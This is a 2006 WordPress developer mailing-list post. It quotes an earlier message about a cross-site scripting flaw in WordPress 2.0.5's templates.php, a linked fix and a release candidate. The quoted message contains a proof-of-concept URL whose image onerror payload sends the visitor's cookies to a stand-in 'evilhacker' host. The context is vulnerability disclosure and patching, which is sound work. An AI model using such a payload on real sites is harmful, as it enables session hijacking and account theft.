[wp-hackers] Xss Vulnerability

dabos daboslab at gmail.com
Fri Dec 29 13:13:52 GMT 2006


Thanks Ryan :)





Dario Salvelli - ICT Junior Student, Italy
Web Site/Blog: www.dariosalvelli.com

Contact:

Gtalk - dariosalvelli-at-gmail-dot-com
Msn - el_cantore-at-hotmail-dot-it
Skype - dariosalvelli


----- Original Message ----- 
From: "Ryan Boren" <ryan at boren.nu>
To: <wp-hackers at lists.automattic.com>
Sent: Thursday, December 28, 2006 6:48 PM
Subject: Re: [wp-hackers] Xss Vulnerability


> On 12/28/06, dabos <daboslab at gmail.com> wrote:
> >
> > Hi Guys. Tell me more about this Xss Vulnerability for Wp 2.0.5 in
> > wp-admin/templates.php ?
> >
> > Proof of concept:
> >
> > https://blogsite/wp/wp-admin/templates.php?file=<img
> > src=""onerror=javascript:
> > document.location.href='http://evilhacker/captureco
> > okie.php?'+document.cookie;>
> >
> > Is this the solution: http://trac.wordpress.org/changeset/4665 ?
> >
> > The last question, when the 2.0.6 final version ? Isn't this
vulnerability
> > in the 2.0.6 Rc 1 ?
>
>
>
> For your testing pleasure:
>
> http://wordpress.org/beta/wordpress-2.0.6-RC2.zip
>
> Ryan
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers



More information about the wp-hackers mailing list